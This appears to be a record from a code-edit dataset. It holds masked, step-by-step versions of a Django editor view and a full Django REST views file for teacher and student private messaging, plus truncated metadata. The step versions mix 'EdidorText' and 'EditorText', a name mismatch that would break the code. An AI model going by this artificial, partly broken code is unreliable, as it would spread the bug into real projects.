"step-3": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-4": "<mask token>\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-5": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.views.generic import CreateView, UpdateView, ListView, \\\n DeleteView, TemplateView\n\nfrom example.forms import EditorTextForm\nfrom example.models import EdidorText\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {\n 'pk': self.object.pk,\n }\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(\n created_by=self.request.user\n )[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from ex.models import Teacher,Student,Group,Report,TeamEvaluation,PrivateLetter,ChatBoxIsOpen
from django.core import serializers
from rest_framework.views import APIView
from rest_framework.response import Response
from django.contrib.auth.hashers import make_password, check_password
# from plane.models import User, Student, LightList, Light, Score, Visit
# from plane.utils.jwt_auth import create_token, get_user_id
# from django.contrib.auth.hashers import make_password, check_password
# from rest_framework.authtoken.models import Token
# from django.contrib.auth import authenticate
import os
from ex.utils.jwt_auth import create_token, get_user_id
from ex.utils.extensions.auth import JwtQueryParamAuthentication
from django.db.models import Q
# Create your views here.
# Teacher side: list every open chat box of the logged-in teacher together
# with the complete, time-ordered message history of each conversation.
class getPrivateLetterListsView(APIView):
    def get(self, request, *args, **kwargs):
        """Return the teacher's open conversations.

        Each entry in ``data``:
            id       -- ChatBoxIsOpen pk
            receiver -- counterpart teacher id, or student stu_num
            msgList  -- messages merged by time; Ienter 1 = sent by the
                        current user, 2 = received
            name     -- receiver + identity digit (client-side list key)
            identity -- 0 counterpart is a teacher, 1 a student
        """
        try:
            try:
                # JWT is taken from the query params; any failure counts
                # as "not logged in".
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            data_list = []
            for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(isOpen=1)):
                msgList = []    # merged conversation, oldest first
                msgList1 = []   # letters sent by the current teacher
                msgList2 = []   # letters received by the current teacher
                receiver = item.receiverTea_id
                identity = 0
                # A box targets either a teacher (receiverTea_id) or a
                # student (receiverStu_id); students are exposed by stu_num.
                if item.receiverStu_id != None:
                    receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
                    identity = 1
                    # Letters this teacher sent to the student.
                    for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 1  # sent by the current user
                        }
                        msgList1.append(data)
                    # Letters the student sent back.
                    for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverTea_id=user_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 2  # received by the current user
                        }
                        msgList2.append(data)
                else:
                    # Teacher-to-teacher conversation: sent letters ...
                    for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 1  # sent by the current user
                        }
                        msgList1.append(data)
                    # ... and received letters.
                    for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverTea_id=user_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 2  # received by the current user
                        }
                        msgList2.append(data)
                # Two-pointer merge of sent/received lists by formatted
                # timestamp ('%Y-%m-%d %H:%M:%S' compares correctly as a
                # string).
                # NOTE(review): the merge assumes each queryset is already
                # time-ordered; that depends on PrivateLetter's default
                # ordering -- confirm in the model Meta.
                len1 = len(msgList1)
                len2 = len(msgList2)
                i1 = 0
                i2 = 0
                for i in range(0,len1 + len2):
                    if i1 >= len1:
                        msgList.append(msgList2[i2])
                        i2+=1
                    elif i2 >= len2:
                        msgList.append(msgList1[i1])
                        i1+=1
                    elif msgList1[i1]['time'] < msgList2[i2]['time']:
                        msgList.append(msgList1[i1])
                        i1+=1
                    else:
                        msgList.append(msgList2[i2])
                        i2+=1
                data = {
                    'id': item.id,
                    'receiver': receiver,
                    'msgList': msgList,
                    'name': receiver + str(identity),
                    'identity': identity
                }
                data_list.append(data)
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': data_list
            })
        except Exception as e:
            # Any unexpected failure is reported with its args; this API
            # uses status 204 as its generic error code.
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Teacher side: send a private letter and make sure the counterpart's
# chat box pointing back at the sender exists.
class enterPrivateLetterView(APIView):
    def post(self, request, *args, **kwargs):
        """Create a PrivateLetter from the logged-in teacher to `receiver`.

        Body: receiver -- teacher id (identity == 0) or student stu_num
              message  -- letter text
              identity -- 0 when the receiver is a teacher, else a student
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            sender_id = payload['id']
            receiver = request.data.get('receiver')
            message = request.data.get('message')
            identity = request.data.get('identity')
            if identity == 0:
                # Teacher-to-teacher letter.
                letter = PrivateLetter(senderTea_id=sender_id, receiverTea_id=receiver, message=message)
                # Fetch-or-create the receiver's box towards the sender.
                box = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver) & Q(receiverTea_id=sender_id)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderTea_id=receiver, receiverTea_id=sender_id)
            else:
                # Teacher-to-student letter: resolve the student pk from stu_num.
                stu_pk = Student.objects.filter(stu_num=receiver).first().id
                letter = PrivateLetter(senderTea_id=sender_id, receiverStu_id=stu_pk, message=message)
                box = ChatBoxIsOpen.objects.filter(Q(senderStu_id=stu_pk) & Q(receiverTea_id=sender_id)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderStu_id=stu_pk, receiverTea_id=sender_id)
            letter.save()
            box.save()
            return Response({
                'status': 200,
                'msg': '发布私信成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Teacher side: return the most recent contacts, newest first, de-duplicated.
class getRecentContactsView(APIView):
    def get(self, request, *args, **kwargs):
        """List counterparts of every letter involving the logged-in teacher.

        Each entry: receiver (teacher id or student stu_num) and
        identity (0 teacher, 1 student).  The newest occurrence of each
        (receiver, identity) pair wins.
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            contacts = []
            # Letters this teacher sent: the counterpart is the receiver.
            for letter in PrivateLetter.objects.filter(senderTea_id=user_id):
                if letter.receiverTea_id is not None and letter.receiverTea_id != "":
                    contacts.append({'receiver': letter.receiverTea_id, 'identity': 0})
                else:
                    peer = Student.objects.filter(id=letter.receiverStu_id).first()
                    contacts.append({'receiver': peer.stu_num, 'identity': 1})
            # Letters this teacher received: the counterpart is the sender.
            for letter in PrivateLetter.objects.filter(receiverTea_id=user_id):
                if letter.senderTea_id is not None and letter.senderTea_id != "":
                    contacts.append({'receiver': letter.senderTea_id, 'identity': 0})
                else:
                    peer = Student.objects.filter(id=letter.senderStu_id).first()
                    contacts.append({'receiver': peer.stu_num, 'identity': 1})
            # Walk backwards from the most recent entry, keeping only the
            # first occurrence of each (receiver, identity) pair.
            seen = set()
            recent = []
            for entry in reversed(contacts):
                key = entry['receiver'] + str(entry['identity'])
                if key not in seen:
                    seen.add(key)
                    recent.append(entry)
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': recent
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Close (delete) an open chat box belonging to the logged-in teacher.
class closeChatBoxView(APIView):
    def post(self, request, *args, **kwargs):
        """Delete the teacher's chat box towards `receiver`.

        Body: receiver -- teacher id (iden == 0) or student stu_num
              iden     -- 0 teacher counterpart, 1 student counterpart
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            receiver = request.data.get('receiver')
            iden = request.data.get('iden')
            if iden == 0:
                chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()
            else:
                # Resolve the student row first and guard against an unknown
                # stu_num instead of crashing on None.id.
                student = Student.objects.filter(stu_num=receiver).first()
                chatBoxIsOpen = None
                if student is not None:
                    chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=student.id)).first()
            # BUG FIX: .first() returns None when no box matches; calling
            # delete() on None raised AttributeError and surfaced as a 204
            # "unexpected error".  Closing an already-absent box is now a
            # no-op success.
            if chatBoxIsOpen is not None:
                chatBoxIsOpen.delete()
            return Response({
                'status': 200,
                'msg': '返回成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Open (ensure existence of) a chat box from the logged-in teacher.
class openChatBoxView(APIView):
    def post(self, request, *args, **kwargs):
        """Fetch-or-create the teacher's chat box towards `receiver`, then save it.

        Body: receiver -- teacher id (identity == 0) or student stu_num
              identity -- 0 teacher counterpart, else student
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            owner_id = payload['id']
            receiver = request.data.get('receiver')
            identity = request.data.get('identity')
            if identity == 0:
                # Counterpart is a teacher, addressed directly by id.
                box = ChatBoxIsOpen.objects.filter(Q(senderTea_id=owner_id) & Q(receiverTea_id=receiver)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderTea_id=owner_id, receiverTea_id=receiver)
            else:
                # Counterpart is a student; translate stu_num to the pk.
                stu_pk = Student.objects.filter(stu_num=receiver).first().id
                box = ChatBoxIsOpen.objects.filter(Q(senderTea_id=owner_id) & Q(receiverStu_id=stu_pk)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderTea_id=owner_id, receiverStu_id=stu_pk)
            # Re-saving an existing box is a harmless write; a missing one
            # is created here.
            box.save()
            return Response({
                'status': 200,
                'msg': '返回成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Search for a contact by teacher id or student number.
class searchContactView(APIView):
    def get(self, request, *args, **kwargs):
        """Classify the searched `receiver`.

        Query params: receiver, identity ('0' means search teachers).
        Result identity codes: 0 existing teacher, 1 existing student,
        3 the requesting teacher searched themselves, 4 not found.
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            receiver = request.GET['receiver']
            identity = request.GET['identity']
            if identity == '0' and user_id == receiver:
                # The teacher looked up their own id.
                iden = 3
            elif identity == '0':
                iden = 0 if Teacher.objects.filter(id=receiver).first() else 4
            else:
                iden = 1 if Student.objects.filter(stu_num=receiver).first() else 4
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': {
                    'identity': iden,
                    'receiver': receiver
                }
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Student side: list every open chat box of the logged-in student together
# with the complete, time-ordered message history of each conversation.
class stuGetPrivateLetterListsView(APIView):
    def get(self, request, *args, **kwargs):
        """Return the student's open conversations.

        Mirrors getPrivateLetterListsView but keyed on senderStu_id /
        receiverStu_id.  Each entry in ``data``:
            id       -- ChatBoxIsOpen pk
            receiver -- counterpart teacher id, or student stu_num
            msgList  -- messages merged by time; Ienter 1 = sent, 2 = received
            name     -- receiver + identity digit (client-side list key)
            identity -- 0 counterpart is a teacher, 1 a student
        """
        try:
            try:
                # JWT is taken from the query params; any failure counts
                # as "not logged in".
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            # NOTE(review): username is read but never used in this handler.
            username = payload['username']
            data_list = []
            for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(isOpen=1)):
                msgList = []    # merged conversation, oldest first
                msgList1 = []   # letters sent by the current student
                msgList2 = []   # letters received by the current student
                receiver = item.receiverTea_id
                identity = 0
                # A box targets either a teacher (receiverTea_id) or a
                # student (receiverStu_id); students are exposed by stu_num.
                if item.receiverStu_id != None:
                    receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
                    identity = 1
                    # Letters this student sent to the other student.
                    for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 1  # sent by the current user
                        }
                        msgList1.append(data)
                    # Letters the other student sent back.
                    for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverStu_id=user_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 2  # received by the current user
                        }
                        msgList2.append(data)
                else:
                    # Student-to-teacher conversation: sent letters ...
                    for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 1  # sent by the current user
                        }
                        msgList1.append(data)
                    # ... and received letters.
                    for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverStu_id=user_id)):
                        data = {
                            'id': item2.id,
                            'message': item2.message,
                            'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
                            'new': item2.new,
                            'Ienter': 2  # received by the current user
                        }
                        msgList2.append(data)
                # Two-pointer merge of sent/received lists by formatted
                # timestamp ('%Y-%m-%d %H:%M:%S' compares correctly as a
                # string).
                # NOTE(review): the merge assumes each queryset is already
                # time-ordered; that depends on PrivateLetter's default
                # ordering -- confirm in the model Meta.
                len1 = len(msgList1)
                len2 = len(msgList2)
                i1 = 0
                i2 = 0
                for i in range(0,len1 + len2):
                    if i1 >= len1:
                        msgList.append(msgList2[i2])
                        i2+=1
                    elif i2 >= len2:
                        msgList.append(msgList1[i1])
                        i1+=1
                    elif msgList1[i1]['time'] < msgList2[i2]['time']:
                        msgList.append(msgList1[i1])
                        i1+=1
                    else:
                        msgList.append(msgList2[i2])
                        i2+=1
                data = {
                    'id': item.id,
                    'receiver': receiver,
                    'msgList': msgList,
                    'name': receiver + str(identity),
                    'identity': identity
                }
                data_list.append(data)
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': data_list
            })
        except Exception as e:
            # Any unexpected failure is reported with its args; this API
            # uses status 204 as its generic error code.
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Student side: send a private letter and make sure the counterpart's
# chat box pointing back at the sender exists.
class stuEnterPrivateLetterView(APIView):
    def post(self, request, *args, **kwargs):
        """Create a PrivateLetter from the logged-in student to `receiver`.

        Body: receiver -- teacher id (identity == 0) or student stu_num
              message  -- letter text
              identity -- 0 when the receiver is a teacher, else a student
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            sender_id = payload['id']
            username = payload['username']  # kept for parity with other handlers; unused here
            receiver = request.data.get('receiver')
            message = request.data.get('message')
            identity = request.data.get('identity')
            if identity == 0:
                # Student-to-teacher letter.
                letter = PrivateLetter(senderStu_id=sender_id, receiverTea_id=receiver, message=message)
                # Fetch-or-create the teacher's box towards the sender.
                box = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver) & Q(receiverStu_id=sender_id)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderTea_id=receiver, receiverStu_id=sender_id)
            else:
                # Student-to-student letter: resolve the peer's pk from stu_num.
                stu_pk = Student.objects.filter(stu_num=receiver).first().id
                letter = PrivateLetter(senderStu_id=sender_id, receiverStu_id=stu_pk, message=message)
                box = ChatBoxIsOpen.objects.filter(Q(senderStu_id=stu_pk) & Q(receiverStu_id=sender_id)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderStu_id=stu_pk, receiverStu_id=sender_id)
            letter.save()
            box.save()
            return Response({
                'status': 200,
                'msg': '发布私信成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# Student side: return the most recent contacts, newest first, de-duplicated.
class stuRecentContactsView(APIView):
    def get(self, request, *args, **kwargs):
        """List counterparts of every letter involving the logged-in student.

        Each entry: receiver (teacher id or student stu_num) and
        identity (0 teacher, 1 student).  The newest occurrence of each
        (receiver, identity) pair wins.
        """
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            contacts = []
            # Letters this student sent: the counterpart is the receiver.
            for letter in PrivateLetter.objects.filter(senderStu_id=user_id):
                if letter.receiverTea_id is not None and letter.receiverTea_id != "":
                    contacts.append({'receiver': letter.receiverTea_id, 'identity': 0})
                else:
                    peer = Student.objects.filter(id=letter.receiverStu_id).first()
                    contacts.append({'receiver': peer.stu_num, 'identity': 1})
            # Letters this student received: the counterpart is the sender.
            for letter in PrivateLetter.objects.filter(receiverStu_id=user_id):
                if letter.senderTea_id is not None and letter.senderTea_id != "":
                    contacts.append({'receiver': letter.senderTea_id, 'identity': 0})
                else:
                    peer = Student.objects.filter(id=letter.senderStu_id).first()
                    contacts.append({'receiver': peer.stu_num, 'identity': 1})
            # Walk backwards from the most recent entry, keeping only the
            # first occurrence of each (receiver, identity) pair.
            seen = set()
            recent = []
            for entry in reversed(contacts):
                key = entry['receiver'] + str(entry['identity'])
                if key not in seen:
                    seen.add(key)
                    recent.append(entry)
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': recent
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# 关闭聊天框 (close a chat box)
class stuCloseChatBoxView(APIView):
    """Close (delete) the chat box between the student and one contact.

    ``iden`` in the request body: 0 = contact is a teacher (``receiver`` is
    a teacher id), otherwise a student (``receiver`` is a student number).
    """

    def post(self, request, *args, **kwargs):
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            receiver = request.data.get('receiver')
            iden = request.data.get('iden')
            if iden == 0:
                chatBoxIsOpen = ChatBoxIsOpen.objects.filter(
                    Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()
            else:
                chatBoxIsOpen = ChatBoxIsOpen.objects.filter(
                    Q(senderStu_id=user_id) &
                    Q(receiverStu_id=Student.objects.filter(
                        stu_num=receiver).first().id)).first()
            # ``.first()`` returns None when no box exists; previously that
            # raised AttributeError on ``.delete()`` and fell into the generic
            # 204 handler. Closing an absent box is now a successful no-op.
            if chatBoxIsOpen is not None:
                chatBoxIsOpen.delete()
            return Response({
                'status': 200,
                'msg': '返回成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# 打开聊天框 (open a chat box)
class stuOpenChatBoxView(APIView):
    """Open the chat box between the student and a contact, creating it
    if it does not exist yet.

    ``identity`` in the request body: 0 = contact is a teacher (``receiver``
    is a teacher id), otherwise a student (``receiver`` is a student number).
    """

    def post(self, request, *args, **kwargs):
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            receiver = request.data.get('receiver')
            identity = request.data.get('identity')
            if identity == 0:
                # Teacher contact, keyed directly by the teacher id.
                box = ChatBoxIsOpen.objects.filter(
                    Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderStu_id=user_id,
                                        receiverTea_id=receiver)
            else:
                # Student contact: resolve the student number to a pk first.
                stu_pk = Student.objects.filter(stu_num=receiver).first().id
                box = ChatBoxIsOpen.objects.filter(
                    Q(senderStu_id=user_id) & Q(receiverStu_id=stu_pk)).first()
                if box is None:
                    box = ChatBoxIsOpen(senderStu_id=user_id,
                                        receiverStu_id=stu_pk)
            box.save()
            return Response({
                'status': 200,
                'msg': '返回成功',
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
# 搜索联系人 (search for a contact)
class stuSearchContactView(APIView):
    """Look up a contact by id/number and report what kind of user it is.

    Result codes in ``data['identity']``: 0 = teacher, 1 = student,
    3 = the searcher themselves, 4 = no such user.
    (Code 2, "not searched yet", is a client-side state.)
    """

    def get(self, request, *args, **kwargs):
        try:
            try:
                payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
            except Exception as e:
                return Response({
                    'status': 403,
                    'msg': '未登录',
                    'err': e.args
                })
            user_id = payload['id']
            username = payload['username']
            receiver = request.GET['receiver']
            identity = request.GET['identity']
            if identity == '1' and username == receiver:
                # The student searched for their own number.
                iden = 3
            elif identity == '0':
                iden = 0 if Teacher.objects.filter(id=receiver).first() else 4
            else:
                iden = 1 if Student.objects.filter(stu_num=receiver).first() else 4
            data = {
                'identity': iden,
                'receiver': receiver
            }
            return Response({
                'status': 200,
                'msg': '返回成功',
                'data': data
            })
        except Exception as e:
            return Response({
                'status': 204,
                'msg': '遇到了异常错误',
                'err': e.args
            })
|
normal
|
{
"blob_id": "4b5794ff79371c2e49c5d2b621805b08c4ff7acb",
"index": 8898,
"step-1": "<mask token>\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': 
item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) 
